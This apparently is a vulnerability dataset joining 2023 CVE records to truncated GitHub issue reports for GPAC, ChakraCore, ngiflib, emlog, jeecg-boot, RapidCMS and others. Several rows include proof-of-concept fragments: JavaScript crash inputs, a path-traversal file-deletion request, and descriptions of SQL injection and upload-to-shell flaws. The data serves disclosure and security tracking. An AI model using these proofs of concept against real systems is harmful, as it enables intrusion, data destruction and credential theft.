A SEGV on unknown address 0x000000000003(0x000000000009) has occurred in function dump_isom_scene /root/gpac/applications/mp4bo... | SEGV on unknown address 0x000000000003(0x000000000009) | https://api.github.com/repos/gpac/gpac/issues/2515/comments | 0 | 2023-07-04T05:41:47Z | 2023-07-04T15:06:27Z | https://github.com/gpac/gpac/issues/2515 | 1,787,186,997 | 2,515 |
CVE-2023-37766 | 2023-07-11T23:15:09.210 | GPAC v2.3-DEV-rev381-g817a848f6-master was discovered to contain a segmentation violation in the gf_isom_remove_user_data function at /lib/libgpac.so. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2516"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev381-g817a848f6-master:*:*:*:*:*:*:*",
"matchCriteriaId": "264FC010-3E8E-4717-8828-B8F53234EECB",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | https://github.com/gpac/gpac/issues/2516 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"gpac",
"gpac"
] | Hello,I use the fuzzer(AFL) to fuzz binary gpac and got some crashes.
The following is the details.
## Title: SEGV on unknown address 0x000000000038
**1. Description**
SEGV on unknown address 0x000000000038 has occurred in function set_file_udta /root/gpac/applications/mp4box/fileimport.c:70:14
when running p... | SEGV on unknown address 0x000000000038 | https://api.github.com/repos/gpac/gpac/issues/2516/comments | 0 | 2023-07-04T13:14:59Z | 2023-07-04T15:06:27Z | https://github.com/gpac/gpac/issues/2516 | 1,787,914,764 | 2,516 |
CVE-2023-37767 | 2023-07-11T23:15:09.250 | GPAC v2.3-DEV-rev381-g817a848f6-master was discovered to contain a segmentation violation in the BM_ParseIndexValueReplace function at /lib/libgpac.so. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2514"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev381-g817a848f6-master:*:*:*:*:*:*:*",
"matchCriteriaId": "264FC010-3E8E-4717-8828-B8F53234EECB",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | https://github.com/gpac/gpac/issues/2514 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"gpac",
"gpac"
] | Hello,I use the fuzzer(AFL) to fuzz binary gpac and got some crashes.
The following is the details.
## Title: SEGV on unknown address 0x000000000000
**1. Description**
A SEGV on unknown address 0x000000000000 has occurred in function dump_isom_scene /root/gpac/applications/mp4box/filedump.c:209:14
when runnin... | SEGV on unknown address 0x000000000000 | https://api.github.com/repos/gpac/gpac/issues/2514/comments | 0 | 2023-07-04T05:31:02Z | 2023-07-04T15:06:27Z | https://github.com/gpac/gpac/issues/2514 | 1,787,177,384 | 2,514 |
CVE-2022-30858 | 2023-07-17T19:15:09.137 | An issue was discovered in ngiflib 0.4. There is SEGV in SDL_LoadAnimatedGif when use SDLaffgif. poc : ./SDLaffgif CA_file2_0 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"inte... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Marsman1996/pocs/blob/master/ngiflib/CVE-2022-30858/README.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ngiflib_project:ngiflib:0.4:*:*:*:*:*:*:*",
"matchCriteriaId": "EEFD7EDE-41CD-4646-BBC8-6500AFC1985E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | https://github.com/miniupnp/ngiflib/issues/22 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"miniupnp",
"ngiflib"
] | I use **llvm-10** and **AddressSanitizer** to build SDLaffgif. The [poc](https://github.com/GHTHYS/poc/blob/main/CA_file2_0) file is :
```./SDLaffgif CA_file2_0
./SDLaffgif CA_file2_0
```
The ASAN information :
```=================================================================
==15828==ERROR: Address... | SDL_LoadAnimatedGif SEGV | https://api.github.com/repos/miniupnp/ngiflib/issues/22/comments | 0 | 2022-05-11T19:34:06Z | 2023-03-04T10:49:35Z | https://github.com/miniupnp/ngiflib/issues/22 | 1,233,098,266 | 22 |
CVE-2023-37139 | 2023-07-18T20:15:09.737 | ChakraCore branch master cbb9b was discovered to contain a stack overflow vulnerability via the function Js::ScopeSlots::IsDebuggerScopeSlotArray(). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chakra-core/ChakraCore/issues/6884"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:chakracore:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7FF3889F-978A-4F39-9A0D-E633A887059B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | https://github.com/chakra-core/ChakraCore/issues/6884 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chakra-core",
"ChakraCore"
] | Branch: `master`
Commit : `cbb9b101d18e4c1682ca39a52a201d8e4241ea17`
POC :
```
function Run() {
var intl = new Intl.Collator();
intl.compare('a','b');/**bp:resume('step_into');locals()**/
let C1 = class NotC1 {
attemptOuterBindingChange() { C1 = 1; }
attemptInnerBindingChange() { NotC1 ... | dynamic-stack-buffer-overflow in release build | https://api.github.com/repos/chakra-core/ChakraCore/issues/6884/comments | 0 | 2023-04-09T03:05:13Z | 2023-04-21T02:43:38Z | https://github.com/chakra-core/ChakraCore/issues/6884 | 1,659,728,699 | 6,884 |
CVE-2023-37140 | 2023-07-18T20:15:09.790 | ChakraCore branch master cbb9b was discovered to contain a segmentation violation via the function Js::DiagScopeVariablesWalker::GetChildrenCount(). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chakra-core/ChakraCore/issues/6885"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:chakracore:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7FF3889F-978A-4F39-9A0D-E633A887059B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | https://github.com/chakra-core/ChakraCore/issues/6885 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chakra-core",
"ChakraCore"
] | Branch: `master`
Commit: `cbb9b101d18e4c1682ca39a52a201d8e4241ea17`
POC:
```
function Run() {
function f1() {
var m = 31;
m++;
var coll = new Intl.Collator();
m += f2();
return m;
}
function f2() {
return 100;
}
function test6() {
... | SEGV (/root/ChakraCore-latest/out/Release/ch+0x8bcaaf) in Js::DiagScopeVariablesWalker::GetChildrenCount() | https://api.github.com/repos/chakra-core/ChakraCore/issues/6885/comments | 1 | 2023-04-09T03:16:59Z | 2023-04-21T02:42:47Z | https://github.com/chakra-core/ChakraCore/issues/6885 | 1,659,731,495 | 6,885 |
CVE-2023-37141 | 2023-07-18T20:15:09.843 | ChakraCore branch master cbb9b was discovered to contain a segmentation violation via the function Js::ProfilingHelpers::ProfiledNewScArray(). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chakra-core/ChakraCore/issues/6886"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:chakracore:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7FF3889F-978A-4F39-9A0D-E633A887059B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | https://github.com/chakra-core/ChakraCore/issues/6886 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chakra-core",
"ChakraCore"
] | Branch: `master`
Commit: `cbb9b101d18e4c1682ca39a52a201d8e4241ea17`
POC is:
```
function attach(f) {
(function (r) {
WScript.Attach(r);
})(f);
}
async function mainTest(notAttachCall) {
if (notAttachCall) {
for (let i = 0; i < 1; []) {
await attach(mainTest);
}
... | SEGV (/root/ChakraCore-latest/out/Release/ch+0xe248a5) in Js::ProfilingHelpers::ProfiledNewScArray(unsigned int, Js::FunctionBody*, unsigned short) | https://api.github.com/repos/chakra-core/ChakraCore/issues/6886/comments | 1 | 2023-04-09T03:28:26Z | 2023-04-21T02:41:02Z | https://github.com/chakra-core/ChakraCore/issues/6886 | 1,659,733,406 | 6,886 |
CVE-2023-37142 | 2023-07-18T20:15:09.890 | ChakraCore branch master cbb9b was discovered to contain a segmentation violation via the function Js::EntryPointInfo::HasInlinees(). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chakra-core/ChakraCore/issues/6887"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:chakracore:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7FF3889F-978A-4F39-9A0D-E633A887059B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | https://github.com/chakra-core/ChakraCore/issues/6887 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chakra-core",
"ChakraCore"
] | Branch: `master`
Commit: `cbb9b101d18e4c1682ca39a52a201d8e4241ea17`
POC is:
```
async function f1() {
await null;
throw WScript.f2a(f1());
}
f1();
async function f2() {
async function f2a() {
throw "err";
}
async function f2b() {
try {
var p = f2a();
... | SEGV (/root/ChakraCore-latest/out/Release/ch+0x6e3fff) in Js::EntryPointInfo::HasInlinees() | https://api.github.com/repos/chakra-core/ChakraCore/issues/6887/comments | 2 | 2023-04-09T03:34:13Z | 2023-04-21T02:46:29Z | https://github.com/chakra-core/ChakraCore/issues/6887 | 1,659,734,429 | 6,887 |
CVE-2023-37143 | 2023-07-18T20:15:09.947 | ChakraCore branch master cbb9b was discovered to contain a segmentation violation via the function BackwardPass::IsEmptyLoopAfterMemOp(). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/chakra-core/ChakraCore/issues/6888"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:chakracore:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7FF3889F-978A-4F39-9A0D-E633A887059B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | https://github.com/chakra-core/ChakraCore/issues/6888 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"chakra-core",
"ChakraCore"
] | Branch: `master`
Commit: `cbb9b101d18e4c1682ca39a52a201d8e4241ea17`
POC is:
```
let xxx = new Uint32Array(0x10000);
xxx.slice = Array.prototype.slice;
function jit(arr, index){
let ut = arr.slice(0,0); //become definite Uint32Array but |arr| is a VirtualUint32Array
for(let i = 0; i < (i + ... | SEGV on unknown address 0x000000000000 | https://api.github.com/repos/chakra-core/ChakraCore/issues/6888/comments | 1 | 2023-04-09T04:55:55Z | 2023-04-21T02:47:23Z | https://github.com/chakra-core/ChakraCore/issues/6888 | 1,659,749,340 | 6,888 |
CVE-2023-37748 | 2023-07-19T17:15:22.323 | ngiflib commit 5e7292 was discovered to contain an infinite loop via the function DecodeGifImg at ngiflib.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/miniupnp/ngiflib/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/miniupnp/ngiflib/issues/25"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:miniupnp_project:ngiflib:-:*:*:*:*:*:*:*",
"matchCriteriaId": "715C2B2D-5B40-4194-A5C4-0250F7B1BF54",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartE... | https://github.com/miniupnp/ngiflib/issues/25 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"miniupnp",
"ngiflib"
] | ### Desctiption
Infinite loop has occurred when running program gif2tga in function DecodeGifImg at ngiflib.c:556
### Version
```
commit 5e7292bfabbeeee8dca0bf4c9a77ff10c8e3bf28 (HEAD -> master, origin/master, origin/HEAD)
Author: Thomas Bernard <miniupnp@free.fr>
Date: Thu Jun 29 01:57:28 2023 +0200
```
... | Infinite loop has occurred when running program gif2tga in function DecodeGifImg at ngiflib.c | https://api.github.com/repos/miniupnp/ngiflib/issues/25/comments | 0 | 2023-06-29T12:57:56Z | 2023-06-29T21:35:53Z | https://github.com/miniupnp/ngiflib/issues/25 | 1,780,772,488 | 25 |
CVE-2023-37645 | 2023-07-20T22:15:10.307 | eyoucms v1.6.3 was discovered to contain an information disclosure vulnerability via the component /custom_model_path/recruit.filelist.txt. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/50"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/weng-xianhu/eyoucms/issues/50 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | eyoucms 1.6.3 has an information leakage vulnerability
A bug was found. There is information leakage.
Tests are executed only in the test environment. No illegal operation
Software Link :https://github.com/weng-xianhu/eyoucms
Website : http://www.eyoucms.com/
Access the file recruit.filelist.txt to obtain ... | eyoucms 1.6.3 has an information leakage vulnerability | https://api.github.com/repos/weng-xianhu/eyoucms/issues/50/comments | 0 | 2023-06-30T03:24:55Z | 2024-03-22T06:46:37Z | https://github.com/weng-xianhu/eyoucms/issues/50 | 1,781,811,190 | 50 |
CVE-2023-3852 | 2023-07-23T22:15:09.477 | A vulnerability was found in OpenRapid RapidCMS up to 1.3.1. It has been declared as critical. This vulnerability affects unknown code of the file /admin/upload.php. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "MULTIPLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PAR... | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"VDB Entry"
],
"url": "https://github.com/OpenRapid/rapidcms/commit/4dff387283060961c362d50105ff8da8ea40bcbe"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yuque:rapidcms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1BB24E33-E6BE-4A10-A4B9-5BF1C11E44F3",
"versionEndExcluding": null,
"versionEndIncluding": "1.3.1",
"versionStartExcludin... | https://github.com/OpenRapid/rapidcms/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"OpenRapid",
"rapidcms"
] | # RapidCMS exists arbitrary file upload vulnerability
An arbitrary file upload vulnerability in `/admin/upload.php` allows attackers to getshell
Firstly, we can register an admin account [username:admin / password:admin] .Then enter the website backend and click the article editing button.
<img width="664" alt="截屏20... | Arbitrary file upload vulnerability | https://api.github.com/repos/OpenRapid/rapidcms/issues/1/comments | 1 | 2023-07-10T09:30:18Z | 2023-07-11T15:00:08Z | https://github.com/OpenRapid/rapidcms/issues/1 | 1,796,360,665 | 1 |
CVE-2023-3745 | 2023-07-24T16:15:13.130 | A heap-based buffer overflow issue was found in ImageMagick's PushCharPixel() function in quantum-private.h. This issue may allow a local attacker to trick the user into opening a specially crafted file, triggering an out-of-bounds read error and allowing an application to crash, resulting in a denial of service. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-3745"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/s... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BA9905B3-D649-46D9-9F93-BD74D9964B61",
"versionEndExcluding": "6.9-11-0",
"versionEndIncluding": null,
"versionS... | https://github.com/ImageMagick/ImageMagick/issues/1857 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to... | heap-buffer-overflow in /MagickCore/quantum-private.h | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1857/comments | 4 | 2020-03-02T14:01:45Z | 2023-07-18T15:28:06Z | https://github.com/ImageMagick/ImageMagick/issues/1857 | 573,994,956 | 1,857 |
CVE-2023-37049 | 2023-07-26T13:15:10.173 | emlog 2.1.9 is vulnerable to Arbitrary file deletion via admin\template.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"inte... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/Num-Nine/CVE/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:emlog:emlog:2.1.9:-:*:*:*:*:*:*",
"matchCriteriaId": "C692BE5B-CD83-4E6F-BA14-823B539FF406",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | https://github.com/Num-Nine/CVE/issues/1 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"Num-Nine",
"CVE"
] | First log in to the home page of the background using the administrator account
Open the admin\template.php template
**../../hello.txt** This location is the root directory file to be deleted
poc:
GET /emlog/admin/template.php?action=del&tpl=**../../hello.txt**&token=c5bc68077f6da2a911df58e6cde92cbc2d0514fd HTT... | emlogcms has an arbitrary file deletion vulnerability | https://api.github.com/repos/QianGeG/CVE/issues/1/comments | 0 | 2023-06-23T13:54:27Z | 2023-06-23T13:54:27Z | https://github.com/QianGeG/CVE/issues/1 | 1,771,506,262 | 1 |
CVE-2023-37732 | 2023-07-26T21:15:10.153 | Yasm v1.3.0.78 was found prone to NULL Pointer Dereference in /libyasm/intnum.c and /elf/elf.c, which allows the attacker to cause a denial of service via a crafted file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://gist.github.com/ChanStormstout/02eea9cf5c002b42b2ff3de5ca939520"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/yasm/yasm/issues/233"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.78.g4dc8:*:*:*:*:*:*:*",
"matchCriteriaId": "0D988178-CCB8-439D-A35D-AF759EC16189",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | https://github.com/yasm/yasm/issues/233 | [
"Exploit"
] | github.com | [
"yasm",
"yasm"
] | # Description
While fuzzing yasm, a SEGV occured which was positioned in yasm/libyasm/intnum.c:399:19 in yasm_intnum_copy.
This bug may allow attackers to cause a crash or denial of service via a designed crafted files.
# Operating system
Ubuntu 20.04.6 LTS
# ASAN info
```
./bin/yasm -p gas -f elf32 -g dwarf2 .... | SEGV in yasm/libyasm/intnum.c's function :yasm_intnum_copy | https://api.github.com/repos/yasm/yasm/issues/233/comments | 0 | 2023-06-29T13:07:01Z | 2023-06-30T15:08:56Z | https://github.com/yasm/yasm/issues/233 | 1,780,786,529 | 233 |
CVE-2023-38992 | 2023-07-28T15:15:12.030 | jeecg-boot v3.5.1 was discovered to contain a SQL injection vulnerability via the title parameter at /sys/dict/loadTreeData. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/5173"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "52891D2B-E0C4-4263-9804-45F1551B5142",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | https://github.com/jeecgboot/jeecg-boot/issues/5173 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### 版本号:
3.5.1
##### 前端版本:vue3版?还是 vue2版?
vue3
##### 问题描述:
存在sql注入,可以获取所有表的信息
类: org.jeecg.modules.system.controller.SysDictController
方法: loadTreeData
URL:/sys/dict/loadTreeData
##### 截图&代码:
这里演示使用zhangsan的token登录之后,查询admin的id和密码,结果如下

Author: Thomas Bernard <miniupnp@free.fr>
Date: Thu Jun 29 23:35:16 2023 +0200
```... | SEGV on unknown address has occurred when running program gif2tga in function main at gif2tag.c | https://api.github.com/repos/miniupnp/ngiflib/issues/27/comments | 1 | 2023-07-10T03:57:53Z | 2023-07-14T23:48:31Z | https://github.com/miniupnp/ngiflib/issues/27 | 1,795,888,010 | 27 |
CVE-2023-38991 | 2023-08-04T00:15:13.870 | An issue in the delete function in the ActModelController class of jeesite v1.2.6 allows authenticated attackers to arbitrarily delete models created by the Administrator. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/thinkgem/jeesite/issues/520"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeesite:jeesite:1.2.6:*:*:*:*:*:*:*",
"matchCriteriaId": "C6C335A4-A2F6-43E7-A432-2568E1D3460B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/thinkgem/jeesite/issues/520 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"thinkgem",
"jeesite"
] | 济南综合部这个普通用户可以随意删除管理员用户创建的模型。
The ordinary user "济南综合部" can freely delete models created by administrator users.
问题代码发生在com.thinkgem.jeesite.modules.act.web.ActModelController
中的delete方法中
The problematic code occurs in the 'delete' method of the 'ActModelController' class in com.thinkgem.jeesite.modules.sys.web.
... | 普通用户可以随意删除管理员用户创建的模型 | https://api.github.com/repos/thinkgem/jeesite/issues/520/comments | 0 | 2023-07-20T17:40:10Z | 2023-07-20T17:40:10Z | https://github.com/thinkgem/jeesite/issues/520 | 1,814,496,355 | 520 |
CVE-2023-38686 | 2023-08-04T16:15:10.550 | Sydent is an identity server for the Matrix communications protocol. Prior to version 2.5.6, if configured to send emails using TLS, Sydent does not verify SMTP servers' certificates. This makes Sydent's emails vulnerable to interception via a man-in-the-middle (MITM) attack. Attackers with privileged access to the ne... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Technical Description"
],
"url": "https://docs.python.org/3/library/ssl.html?highlight=ssl#security-considerations"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.co... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:matrix:sydent:*:*:*:*:*:*:*:*",
"matchCriteriaId": "591FD375-A95C-4A68-A63F-E7DC33B4533A",
"versionEndExcluding": "2.5.6",
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/python/cpython/issues/91826 | [
"Issue Tracking"
] | github.com | [
"python",
"cpython"
] | **Feature or enhancement**
I was [surprised](https://twitter.com/the_compiler/status/1517456299260362752) that Python does not verify hostnames by default for the stdlib modules for SMTP, IMAP, FTP, POP and NNTP. I believe the "insecure by default" behavior is no longer appropriate even for those protocol (at least ... | Enable TLS certificate validation by default for SMTP/IMAP/FTP/POP/NNTP protocols | https://api.github.com/repos/python/cpython/issues/91826/comments | 25 | 2022-04-22T15:50:14Z | 2024-01-04T11:23:39Z | https://github.com/python/cpython/issues/91826 | 1,212,522,412 | 91,826 |
CVE-2023-36095 | 2023-08-05T03:15:13.580 | An issue in Harrison Chase langchain v.0.0.194 allows an attacker to execute arbitrary code via the python exec calls in the PALChain, affected functions include from_math_prompt and from_colored_object_prompt. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://langchain.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/hwchase17/langchain"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:langchain:langchain:0.0.194:*:*:*:*:*:*:*",
"matchCriteriaId": "7186FBDD-894A-41C2-A682-D7B2B95107C9",
